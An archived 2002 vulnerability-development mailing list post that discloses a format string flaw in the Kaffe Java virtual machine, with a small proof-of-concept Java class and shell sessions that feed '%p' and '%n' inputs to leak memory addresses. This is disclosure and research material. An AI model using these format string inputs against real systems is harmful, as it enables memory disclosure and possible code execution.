Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Latest Kaffe Java Virtual Machine Format Strings issue.

From: KF <dotslash () snosoft com>
Date: Tue, 05 Mar 2002 12:07:17 -0500
Ok I sent this out twice already... I don't know what happened... I got zero response from vuln-dev or from the Vendor for that matter... so lets try again... The latest version of kaffe JVM and most of the older versions I tested are vuln to format strings attack... Below are 2 local examples...one from the java command line and one malicious class file. Perhaps this could be remotely exploited via a servlet engine or something that server out jsp pages...maybe even a malicious .class could take advantage of it (example provided) with java.lang.Class.forName(). I think it needs to be addressed either way. This was sent to the kaffe authors email address with no response as well as posted on their bugtracking forum thing which I can't seem to figure out how to navigate...so there was an attempt at vendor notification. 
-KF

[root@localhost root]# cat > test.java
class test
{
       public static void main(String args[])
       throws Exception
       {
               Class c = Class.forName("%p");
       }
}

[root@localhost root]# javac test.java
[root@localhost root]# java test
java.lang.NoClassDefFoundError: 0x4003256a <---------------- note the memory address here. 
       at java.lang.Class.forName(Class.java:native)
       at java.lang.Class.forName(Class.java:52)
       at test.main(test.java:6)

[root@localhost root]# rpm -ivh kaffe-1.0.6-6.i386.rpm
Preparing... ########################################### [100%] 1:kaffe ########################################### [100%] 
[root@localhost root]# which kaffe
/usr/bin/kaffe
[root@localhost root]# kaffe -version
Kaffe Virtual Machine
Copyright (c) 1996-2000
Transvirtual Technologies, Inc.  All rights reserved
Engine: Just-in-time v3   Version: 1.0.6   Java Version: 1.1
[root@localhost root]# kaffe %p.%p.%p.%p.%p
java.lang.NoClassDefFoundError: 0x4003256a/0x4006fa14/0xbfffee98/0xbfffed80/0x40033910 
       at java.lang.Class.forName(Class.java:native)
       at java.lang.Class.forName(Class.java:52)
[root@localhost root]# kaffe %n

-KF
Previous By Date Next
Previous By Thread Next

Current thread: